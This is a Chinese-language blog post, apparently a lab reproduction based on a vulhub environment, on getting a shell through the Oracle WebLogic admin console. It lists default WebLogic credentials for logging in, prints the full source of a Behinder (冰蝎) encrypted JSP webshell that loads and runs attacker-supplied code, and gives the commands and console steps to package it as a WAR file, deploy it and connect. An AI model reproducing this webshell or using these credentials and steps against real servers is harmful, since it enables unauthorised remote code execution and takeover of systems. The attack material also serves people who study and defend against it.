weblogic后台getshell

字数:325字 | 预计阅读时长:1分钟

复现过程

1.登陆

http://IP:端口/console

要在后台getshell,必须得先登录,如何获取到登陆凭证,弱口令、爆破,或者其他社工方式。

weblogic常见口令

system password
weblogic weblogic
guest guest
portaladmin portaladmin
admin security
joe password
mary password
system security
wlcsystem wlcsystem
wlcsystem sipisystem

2.制作war包

新建shell.jsp文件,内容为冰蝎webshell

1
2
3
4
5
6
7
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class
Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b
.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).rep
lace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.g
etInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES")
);new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decode
Buffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

压缩webshell

zip shell.zip shell.jsp

改变后缀

mv shell.zip shell.war

3.部署

3.上载文件

4.选择我们做好的shell.war

5.下一步

6.下一步,安装为应用程序

7.下一步

8.点击完成

9.点击保存,显示设置成功

10.当再次点击菜单栏的[部署]时,已经可以看到我们部署的应用程序

11.使用冰蝎连接

http://IP:端口/shell/shell.jsp

参考链接

http://github.com/vulhub/vulhub/tree/master/weblogic/weak_password/

http://www.cnblogs.com/bmjoker/p/9822886.html/

http://www.pianshen.com/article/9302224952//

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。